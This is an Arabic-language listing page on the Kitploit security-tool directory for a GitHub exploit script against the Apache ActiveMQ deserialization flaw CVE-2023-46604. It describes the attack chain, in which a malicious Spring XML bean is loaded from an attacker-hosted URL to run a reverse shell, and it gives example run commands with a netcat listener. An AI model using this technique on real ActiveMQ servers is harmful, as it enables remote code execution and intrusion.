Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46604 — يستغل السكريبت ثغرة إلغاء التسلسل غير الآمن في Apache ActiveMQ (CVE-2023-46604) | Kitploit
أدوات/GitHubGitHub/pulentoski/cve-2023-46604
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

يستغل السكريبت ثغرة إلغاء التسلسل غير الآمن في Apache ActiveMQ (CVE-2023-46604)

عرض المستودع
114منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Resumen Técnico del Ataque: CVE-2023-46604

يستغل السكربت ثغرة إلغاء التسلسل غير الآمن في Apache ActiveMQ (CVE-2023-46604) لتحقيق تنفيذ التعليمات البرمجية عن بُعد على الخادم المستهدف. وصف عملية الاستغلال

root@kitploit:~
هدف الثغرة الأمنية:
    تكمن الثغرة في بروتوكول OpenWire الخاص بـ Apache ActiveMQ.
    تسمح بإلغاء تسلسل غير آمن للكائنات، وهو ما يمكن استغلاله لتنفيذ كود عشوائي على الخادم.

المتطلبات المسبقة:
    الوصول الشبكي إلى خادم ActiveMQ.
    ملف XML خبيث (poc.xml) متاح عبر رابط URL يمكن للخادم المستهدف الوصول إليه.

مكونات الهجوم:
    سكربت Python: يعمل على أتمتة إرسال الحمولة الخبيثة إلى خادم ActiveMQ.
    ملف XML (poc.xml): يحتوي على Bean من Spring يُعرّف تنفيذ أمر خبيث (مثل فتح شل عكسي).

خطوات الهجوم

root@kitploit:~
تحضير الحمولة (Payload):
    ينشئ السكربت رسالة بالنظام الست عشري تتضمن:
        اسم فئة Java: org.springframework.context.support.ClassPathXmlApplicationContext.
        رابط URL الخاص بملف XML الخبيث.
    يتم تحويل الحمولة إلى تسلسل بايتات يمكن إرسالها عبر بروتوكول OpenWire.

إرسال الحمولة:
    يفتح السكربت اتصال Socket عبر TCP إلى خادم ActiveMQ على المنفذ المحدد (الافتراضي 61616).
    يرسل الحمولة الخبيثة إلى الخادم.

تنفيذ الكود الخبيث:
    يقوم خادم ActiveMQ بإلغاء تسلسل الكائن المحدد في الحمولة.
    بسبب إلغاء التسلسل غير الآمن، يتم تحميل وتنفيذ Bean الخاص بـ Spring والمُعرّف في ملف XML.
    ينفذ هذا الـ Bean أمرًا خبيثًا (مثل شل عكسي) على الخادم.

    _________________________________________________________

مثال على التشغيل:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

تم نسخ هذا السكربت وتعديله إلى الإسبانية:https://github.com/evkl1d/CVE-2023-46604.git

تنزيل الأداة